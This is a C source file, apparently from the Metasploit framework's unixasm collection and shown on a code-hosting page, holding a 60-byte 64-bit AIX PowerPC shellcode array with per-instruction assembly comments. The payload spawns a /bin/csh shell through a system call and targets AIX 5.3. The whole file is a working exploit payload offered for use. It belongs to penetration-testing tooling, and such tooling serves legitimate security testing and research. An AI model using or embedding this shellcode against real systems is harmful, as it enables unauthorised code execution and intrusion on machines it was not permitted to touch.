Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/external/source/unixasm/aix-power-shellcode64.c
Views: 11766
/*1* $Id: aix-power-shellcode64.c 40 2008-11-17 02:45:30Z ramon $2*3* aix-power-shellcode64.c - AIX Power shellcode4* Copyright 2008 Ramon de Carvalho Valle <[email protected]>5*6* This library is free software; you can redistribute it and/or7* modify it under the terms of the GNU Lesser General Public8* License as published by the Free Software Foundation; either9* version 2.1 of the License, or (at your option) any later version.10*11* This library is distributed in the hope that it will be useful,12* but WITHOUT ANY WARRANTY; without even the implied warranty of13* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU14* Lesser General Public License for more details.15*16* You should have received a copy of the GNU Lesser General Public17* License along with this library; if not, write to the Free Software18* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA19*20*/2122/*23* Currently supported AIX levels.24* -DV530 AIX 5.3.025*26*/2728char shellcode64[]= /* 60 bytes */29"\x3b\xe0\x01\xff" /* lil r31,511 */30"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */31"\x40\x82\xff\xf9" /* bnel <shellcode64> */32"\x7f\xc8\x02\xa6" /* mflr r30 */33"\x3b\xde\x01\xff" /* cal r30,511(r30) */34"\x38\x7e\xfe\x29" /* cal r3,-471(r30) */35"\x98\xbe\xfe\x31" /* stb r5,-463(r30) */36"\xf8\xa1\xff\xf9" /* stdu r5,-8(r1) */37"\xf8\x61\xff\xf9" /* stdu r3,-8(r1) */38"\x7c\x24\x0b\x78" /* mr r4,r1 */39#ifdef V53040"\x38\x42\xfe\x06" /* cal r2,-506(r2) */41#endif42"\x4c\xc6\x33\x42" /* crorc 6,6,6 */43"\x44\xff\xff\x02" /* svca 0 */44"/bin/csh"45;46474849